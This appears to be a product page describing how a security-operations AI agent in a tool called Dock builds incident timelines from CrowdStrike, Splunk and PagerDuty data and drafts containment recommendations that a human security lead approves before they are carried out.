When an alert fires, the response team needs three things fast: a clean timeline, the indicators of compromise, and a containment decision that someone signed. Dock gives a SecOps agent a workspace to assemble all three. The agent pulls events from CrowdStrike, correlates them in Splunk, ties them to the PagerDuty page, and drafts a response brief. The security lead reads the brief in Dock and approves containment from the same row. The audit trail comes out of the workflow, not a separate write-up.
CrowdStrike, Splunk, and PagerDuty stay the system of record for the raw data. Dock is the system of record for what the AGENT INTERPRETS. Each Dock row carries a pointer back to the platform record, agent identity, decision, reviewer, and timestamp. The agent re-fetches platform data via fresh API reads when it needs current state.
The incident table
| Incident ID | PD Page | Hosts | IoCs | Stage | Agent Recommendation | Approver | Status |
|---|---|---|---|---|---|---|---|
| INC-3318 | PD-88421 | api-prod-07 | hash:a91f, ip:185.x.x.42 | Containment | Isolate host, block hash org-wide | sarah@ | Approved 14:22 |
| INC-3319 | PD-88425 | mac-eng-12 | domain:cdn-update.win | Triage | Quarantine, request memory image | (pending) | Drafting |
| INC-3320 | PD-88431 | k8s-pay-04 | suspicious egress 9.4 GB | Investigation | No containment, monitor 24h | govind@ | Approved 14:51 |
Each row stores the CrowdStrike detection IDs, the Splunk search that produced the correlation, and the PagerDuty incident link. The Recommendation column is the agent's read. The Approver column is the human who signed it.
The workflow
A PagerDuty page lands. The agent opens INC-3319, pulls the triggering CrowdStrike detection, runs a Splunk search across the prior six hours of process and DNS telemetry from the affected host, and lays the events on a timeline ordered by host clock. It tags techniques against the MITRE ATT&CK matrix so the lead can scan the kill chain in one column. It drafts a response brief with the IoCs, the blast radius (which other hosts touched the same domain), and a recommended containment action.
Containment is a dangerous operation. The agent does not isolate the host itself. It posts the brief to the row and pings the on-call security lead. The lead reads the brief, opens the CrowdStrike console from the row link to confirm current state, and clicks Approve. Dock writes the approval to the row, then the agent fires the isolation call against CrowdStrike under the lead's authority. The PagerDuty incident gets a comment with the Dock row link.
Why this matters
The post-incident review is the part SecOps teams dread. Three tools, three exports, one analyst stitching a story. Dock removes the stitching. The timeline, the recommendation, the approver, and the resulting platform action are one row. The agent's identity is on every interpretation, separate from the human who approved containment. This is the same primitive the DevOps incident workflow uses for production outages, applied to a security context where attribution carries legal weight.
Audit and compliance teams read the same row. The agent audit log feeds the compliance evidence packet without a separate collection pass.
Start with one detection type on the SecOps pillar.
FAQ
Does the agent ever contain a host on its own? No. Isolation, hash-blocking, account disable, and egress rules are all gated. The agent drafts, a security lead approves, and the agent then calls the platform API under the approval.
What standard does the timeline follow? The brief structure mirrors the phases in NIST SP 800-61 Rev. 2: detection and analysis, containment, eradication, recovery, post-incident. Each phase has its own column in the row so the post-mortem writes itself.
How does Dock handle false positives? A row can close at Triage with a Recommendation of "no action, suppression rule X added." The CrowdStrike and Splunk pointers stay attached, so the next similar detection inherits context.
Can two agents work the same incident? Yes, but each interpretation is attributed separately. If a triage agent escalates to a forensics agent, the row shows two agent identities with their own recommendations, and the human lead approves against the merged brief.
